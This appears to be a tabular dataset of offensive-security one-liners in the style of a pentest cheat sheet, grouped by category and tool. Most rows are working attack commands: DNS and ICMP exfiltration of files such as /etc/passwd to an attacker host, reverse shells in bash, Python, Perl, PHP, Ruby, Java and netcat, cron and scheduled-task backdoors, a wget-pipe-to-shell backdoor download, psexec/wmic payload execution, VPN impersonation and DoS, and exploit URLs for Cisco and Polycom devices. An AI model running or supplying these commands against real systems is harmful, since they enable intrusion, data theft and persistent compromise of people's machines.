category
stringclasses
51 values
command
stringlengths
1
755
description
stringlengths
3
70
CISCO Commands
dir /all
List deleted files
CISCO Commands
show running-config
Display config loaded in memory
CISCO Commands
show startup-config
Display config loaded at boot
CISCO Commands
show ip interface brief
Display interface summary
CISCO Commands
show interface e0
Display detailed interface info
CISCO Commands
show ip route
Display routes
CISCO Commands
show access-lists
Display access lists
CISCO Commands
terminal length 0
No limit on output
CISCO Commands
copy running-config startup-config
Save running config to startup
CISCO Commands
copy running-config tftp
Copy running config to TFTP server
CISCO Commands
http://ip/level/16-99/exec/show/config
Exploit Cisco IOS 11.2-12.2 vulnerability
SNMP
./snmpblow.pl -s srcip -d rtr_ip -t attackerip -f out.txt snmpstrings.txt
SNMP brute force with snmpblow.pl
SNMP
snmpwalk -c public -v1 ip .1 | grep hrSWRunName | cut -d" " -f4
List Windows running services
SNMP
snmpwalk -c public -v1 ip .1 | grep tcpConnState | cut -d" " -f6 | sort -u
List Windows open TCP ports
SNMP
snmpwalk -c public -v1 ip .1 | grep hrSWInstalledName
List Windows installed software
SNMP
snmpwalk -c public -v1 ip 1.3 | grep --.1.2.25 | cut -d" " -f4
List Windows users
Packet Capturing
tcpdump -nvvX -s0 -i eth0 tcp portrange 22-23
Capture TCP traffic on ports 22-23
Packet Capturing
tcpdump -i eth0 -tttt dst ip and not net 1.1.1.0/24
Capture traffic to IP excluding subnet
Packet Capturing
tcpdump net 192.1.1.0/24
Capture traffic between local 192.1.1.0/24
Packet Capturing
dumpcap -i eth0 -a duration:sec -w file.pcap
Capture traffic for specified seconds
Packet Capturing
file2cable -i eth0 -f file.pcap
Replay PCAP file
Packet Capturing
tcpreplay --topspeed --loop=0 --intf=eth0 pcap_file_to_replay
Replay packets (possible DoS)
DNS
./dnsrecon.rb -t rvs -i 192.1.1.1,192.1.1.20
Reverse lookup for IP range
DNS
./dnsrecon.rb -t std -d domain.com
Retrieve standard DNS records
DNS
./dnsrecon.rb -t brt -d domain.com -w hosts.txt
Enumerate subdomains
DNS
./dnsrecon -d domain.com -t axfr
DNS zone transfer
DNS
nmap -R -sL -Pn -dns-servers dns_svr_ip range | awk '{if(($1" "$2" "$3)=="Nmap scan report") print $5" "$6}' | sed 's/(//g' | sed 's/)//g' > dns.txt
Nmap reverse DNS lookup and output parser
VPN
ike-scan -M -A vpn_ip -P file
Write PSK to file
VPN
ike-scan -A -t 1 --sourceip=spoof_ip dst_ip
DoS VPN server
VPN
if (ip.proto == UDP && udp.src == 500) { kill(); drop(); msg("UDP packet dropped!"); }
Ettercap filter to drop IPSEC traffic (UDP 500)
VPN
etterfilter udpdrop.filter -o udpdrop.ef
Compile Ettercap filter
VPN
ettercap -T -q -M arp -F udpdrop.ef // //
Start Ettercap to drop IPSEC traffic
VPN
echo 1 > /proc/sys/net/ipv4/ip_forward
Enable IP forwarding
VPN
iptables -t nat -A PREROUTING -p udp -i eth0 -d VPN_Server_IP -j DNAT --to Attacking_Host_IP; iptables -P FORWARD ACCEPT
Configure iptables for port forwarding to Fiked
VPN
fiked -g vpn_gateway_ip -k VPN_Group_Name:Group_Pre-Shared_Key
Start Fiked to impersonate VPN server
VPN
ettercap -T -M arp // //
Restart Ettercap without filter
PuTTY
[HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\Default%20Settings] "LogFileName"="%TEMP%\\putty.dat" "LogType"=dword:00000002
Registry key to log all PuTTY activity
File Transfer
echo open ip 21 > ftp.txt; echo user >> ftp.txt; echo pass >> ftp.txt; echo bin >> ftp.txt; echo GET file >> ftp.txt; echo bye >> ftp.txt; ftp -s:ftp.txt
Execute FTP commands from script file
File Transfer
ncat ip 21 < ftp.txt
Alternative FTP transfer using ncat
File Transfer
xxd -p secret file.hex
Hex encode file on victim (Linux)
File Transfer
for b in $(cat file.hex); do dig $b.shell.evilexample.com; done
DNS lookup for each hex line (victim)
File Transfer
tcpdump -w /tmp/dns -s0 port 53 and host system.example.com
Capture DNS exfil packets (attacker)
File Transfer
tcpdump -r /tmp/dns -n | grep shell.evilexample.com | cut -f9 -d' ' | cut -f1 -d'.' | uniq > received.txt
Extract hex from DNS packets (attacker)
File Transfer
xxd -r -p received.txt keys.pgp
Reverse hex encoding (attacker)
File Transfer
stringZ=$(cat /etc/passwd | od -tx1 | cut -c8- | tr -d " " | tr -d "\n"); counter=0; while [ $counter -lt ${#stringZ} ]; do ping -s 16 -c 1 -p ${stringZ:$counter:16} 192.168.10.10 && counter=$((counter+16)); done
Exfil command output over ICMP (victim)
File Transfer
tcpdump -ntvvSxs 0 'icmp[0]=8' -w data.dmp; grep Ox0020 data.dmp | cut -c21- | tr -d " " | tr -d "\n" | xxd -r -p
Capture and parse ICMP exfil (attacker)
File Transfer
telnet x.x.x.x 25; HELO x.x.x.x; MAIL FROM: [email protected]; RCPT TO: [email protected]; DATA; Thank You.; .; quit
Send email via telnet (open mail relay)
Reverse Shells
nc 10.0.0.1 1234 -e /bin/sh
Netcat reverse shell (Linux)
Reverse Shells
ncat 10.0.0.1 1234 --exec /bin/sh
Ncat reverse shell (Linux)
Reverse Shells
nc 10.0.0.1 1234 -e cmd.exe
Netcat reverse shell (Windows)
Reverse Shells
ncat 10.0.0.1 1234 --exec cmd.exe
Ncat reverse shell (Windows)
Reverse Shells
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 1234 > /tmp/f
Netcat reverse shell without -e option
Reverse Shells
socat TCP:10.0.0.1:1234 EXEC:/bin/sh
Socat reverse shell (Linux)
Reverse Shells
perl -e 'use Socket; $i="10.0.0.1"; $p=1234; socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){ open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i"); };'
Perl reverse shell (Linux)
Reverse Shells
perl -MIO -e '$p=fork; exit if $p; $c=new IO::Socket::INET(PeerAddr,"attackerip:4444"); STDIN->fdopen($c,r); $~->fdopen($c,w); system $_ while <>; '
Perl reverse shell without /bin/sh
Reverse Shells
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444"); STDIN->fdopen($c,r); $~->fdopen($c,w); system $_ while <>; '
Perl reverse shell (Windows)
Reverse Shells
python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("10.0.0.1",1234)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'
Python reverse shell (Linux)
Reverse Shells
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Bash reverse shell
Reverse Shells
r = Runtime.getRuntime(); p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]); p.waitFor();
Java reverse shell
Reverse Shells
php -r '$sock=fsockopen("10.0.0.1",1234); exec("/bin/sh -i <&3 >&3 2>&3");'
PHP reverse shell
Reverse Shells
ruby -rsocket -e 'f=TCPSocket.open("10.0.0.1",1234).to_i; exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Ruby reverse shell (Linux)
Reverse Shells
ruby -rsocket -e 'exit if fork; c=TCPSocket.new("attackerip","4444"); while(cmd=c.gets); IO.popen(cmd,"r"){|io|c.print io.read} end'
Ruby reverse shell without /bin/sh
Reverse Shells
ruby -rsocket -e 'c=TCPSocket.new("attackerip","4444"); while(cmd=c.gets); IO.popen(cmd,"r"){|io|c.print io.read} end'
Ruby reverse shell (Windows)
Reverse Shells
rm -f /tmp/p; mknod /tmp/p p && telnet attackerip 4444 0</tmp/p | /bin/bash 1>/tmp/p
Telnet reverse shell (option 1)
Reverse Shells
telnet attackerip 4444 | /bin/bash | telnet attackerip 4445
Telnet reverse shell (option 2)
Reverse Shells
xterm -display 10.0.0.1:1; Xnest :1; xhost +victimIP
Xterm reverse shell with listener setup
Persistence
crontab -e; 0-59/10 * * * * nc ip 777 -e /bin/bash
Linux persistence via crontab (every 10 min)
Persistence
sc config schedule start=auto; net start schedule; at 13:30 "C:\nc.exe ip 777 -e cmd.exe"
Windows task scheduler persistence (legacy)
Persistence
schtasks /create /tn "Backdoor" /tr "C:\nc.exe ip 777 -e cmd.exe" /sc daily /st 13:30 /ru System
Windows task scheduler persistence (modern)
Persistence
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v firewall /t REG_SZ /d "c:\windows\system32\backdoor.exe" /f; at 19:00 /every:M,T,W,Th,F cmd /c start "%USERPROFILE%\backdoor.exe"; SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "%USERPROFILE%\backdoor.exe" /ED 12/12/2012
Windows persistent backdoor with firewall bypass
Persistence
wget http://server/backdoor.sh -O - | sh
Download and run backdoor script (Linux)
Remote Payload Deployment
net share payload_share=C:\payload_folder /grant:Everyone,FULL
Share payload folder via SMB (victim)
Remote Payload Deployment
psexec \\remote_ip /u domain\compromised_user /p password "\\payload_ip\test\msf.exe"
Execute payload via SMB (psexec)
Remote Payload Deployment
wmic /node:remote_ip /user:domain\compromised_user /password:password process call create "\\payload_ip\test\msf.exe"
Execute payload via SMB (wmic)
Remote Payload Deployment
use auxiliary/server/webdav_file_server; set localexe true; set localfile payload; set localroot payload_directory; set disablePayloadHandler true; run; psexec \\remote_ip /u domain\compromised_user /p password "\\payload_ip\test\msf.exe"
Deploy payload via WebDAV (Metasploit)
Tunneling
fpipe.exe -l 1234 -r 80 2.2.2.2
Listen on 1234, forward to port 80
Tunneling
socks.exe -i 1.1.1.1 -p 8080
SOCKS proxy on redirector (1.1.1.1:8080)
Tunneling
proxychains4 nmap -Pn -vv -sT -p 22,135,139,445 2.2.2.2
Scan intranet through SOCKS proxy
Tunneling
socat TCP4-LISTEN:1234 TCP4:2.2.2.2:80
Listen on 1234, forward to port 80
Tunneling
echo -e "[netcat client]\nclient = yes\naccept = 5555\nconnect = listening_ip:4444" > /etc/stunnel/stunnel.conf; echo -e "[netcat server]\nclient = no\naccept = 4444\nconnect = 127.0.0.1:4444" > /etc/stunnel/stunnel.conf; stunnel; nc -vlp 4444
SSL encapsulated netcat tunnel
Google Hacking
numrange:[#]-[#]
Search within a number range
Google Hacking
date:[#]
Search within past [#] months
Google Hacking
link:[url]
Find pages that link to [url]
Google Hacking
related:[url]
Find pages related to [url]
Google Hacking
intitle:[string]
Find pages with [string] in title
Google Hacking
inurl:[string]
Find pages with [string] in URL
Google Hacking
filetype:[xls]
Find files of type xls
Google Hacking
phonebook:[name]
Find phone book listings of [name]
Video Teleconferencing
telnet ip
Polycom: Enter 1 char to get uname:pwd
Video Teleconferencing
http://ip/getsecure.cgi
Polycom: Access secure config
Video Teleconferencing
http://ip/erarcl.htm
Polycom: Access remote control
Video Teleconferencing
http://ip/asecurity.htm
Polycom: Access security settings
Video Teleconferencing
http://ip/arc.htm
Polycom: Access remote control
Video Teleconferencing
http://ip/firmwareVersion
Polycom: Check firmware version
Video Teleconferencing
http://ip/snapctrl.ssi
Tandberg: Access snapshot control
Video Teleconferencing
http://ip/command/visca-gen.cgi?visca=8101046202FF
Sony Webcam: Freeze camera